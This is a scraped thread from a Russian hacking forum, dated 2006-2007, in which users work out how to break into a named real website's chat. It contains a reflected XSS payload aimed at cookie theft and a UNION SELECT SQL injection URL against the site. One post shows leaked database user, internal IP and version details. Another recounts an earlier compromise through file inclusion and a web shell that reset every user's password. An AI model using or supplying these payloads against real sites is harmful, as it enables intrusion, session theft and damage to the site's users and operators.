Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

21.10.2006, 05:17
|
|
Новичок
Регистрация: 16.10.2006
Сообщений: 18
Провел на форуме: 48695
Репутация:
17
|
|
...
Сообщение от vnuki
to kaban ты дал мне эту ссылкук http://www.telecom7.ru/Chat/board.php?ss="><script>alert(/XSS/)</script>
я её вставил и ты дал ещё одну ссылку чтоб почитать но я так толкьом не понял к чему она.если тебе не трудно то обьясни...пожалуста.
Это значит что первый SQL запрос выдал ошибку => тебе надо присоединить еще один SQL запрос UNION SELECT 1,2,3/* вот тогда первый выдает ошибку выполняется второй, по-моему на этом сайте во второй колонке передается индентификатор рмсунка => можно попытаться исполнить произволбный php код ))
|
|
|

21.10.2006, 16:20
|
|
Новичок
Регистрация: 20.10.2006
Сообщений: 25
Провел на форуме: 601498
Репутация:
16
|
|
Сообщение от corsp_puttrider
Это значит что первый SQL запрос выдал ошибку => тебе надо присоединить еще один SQL запрос UNION SELECT 1,2,3/* вот тогда первый выдает ошибку выполняется второй, по-моему на этом сайте во второй колонке передается индентификатор рмсунка => можно попытаться исполнить произволбный php код ))
у тебя есть icq ? дай пожалуста я тебе стукну.и ты мне если не трудно обьясни по понятнее.
|
|
|

21.10.2006, 16:28
|
|
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
Провел на форуме: 7670961
Репутация:
1034
|
|
Вариант со сукулью не пройдёт не отобразит из за ошибки
http://www.telecom7.ru/Chat/Img.php?id=-211578+union+select+null,user(),null/*
|
|
|

21.10.2006, 19:53
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме: 9751379
Репутация:
3812
|
|
2 Nova
а если просмотреть исходный код изображения то получем
USER() telecom7@192.168.212.116
VERSION() 4.0.15a
DATABASE() telecom7
__________________
|
|
|

21.10.2006, 21:31
|
|
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
Провел на форуме: 7670961
Репутация:
1034
|
|
Сообщение от +toxa+
2 Nova
а если просмотреть исходный код изображения то получем
USER() telecom7@192.168.212.116
VERSION() 4.0.15a
DATABASE() telecom7
Мдя а я незаметил =)
|
|
|

18.05.2007, 01:37
|
|
Новичок
Регистрация: 19.04.2005
Сообщений: 15
Провел на форуме: 8294
Репутация:
1
|
|
Ну так что, его возможно взломать или нет? Что то так никто и не даёт точного ответа! Я слышал что его можно ломануть через сниффер но у меня что то не получилось! Чат его не принимает!
|
|
|

19.05.2007, 23:49
|
|
Познающий
Регистрация: 10.12.2006
Сообщений: 41
Провел на форуме: 202200
Репутация:
26
|
|
Joker_kill
Что за бред ты несеш? Прочитай посты, а мы о чём говорим?
И с чего ты сделал вывод, что тут хакеров нету? Если ты слепой это твои проблемы...
Ну так что, его возможно взломать или нет?
ЗАПОМНИ
Всё что создано человеком, можно сломать.
|
|
|

20.05.2007, 13:19
|
|
Новичок
Регистрация: 18.04.2007
Сообщений: 22
Провел на форуме: 609007
Репутация:
27
|
|
Помнится в конце прошлого лета, я его поломал при помощи php-инклудинга. Затем через веб-шелл в eval() накатал скрипт, для смены пароля для определённого пользователя, но из-за ошибки в этом скрипте у всех пользователей пароль сменился на "p4ssw0rd". Админ 3 дня откат БД делал, а вину всю на своего прова свалил). Потом вроде эту багу прикрыли...
|
|
|

20.05.2007, 13:40
|
|
Познающий
Регистрация: 30.04.2007
Сообщений: 67
Провел на форуме: 287714
Репутация:
40
|
|
http://www.telecom7.ru/Chat/board.php?ss="><script>alert(document.cookie)</script>
покруи вызови вторую ошибку и всё будет круть))))
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|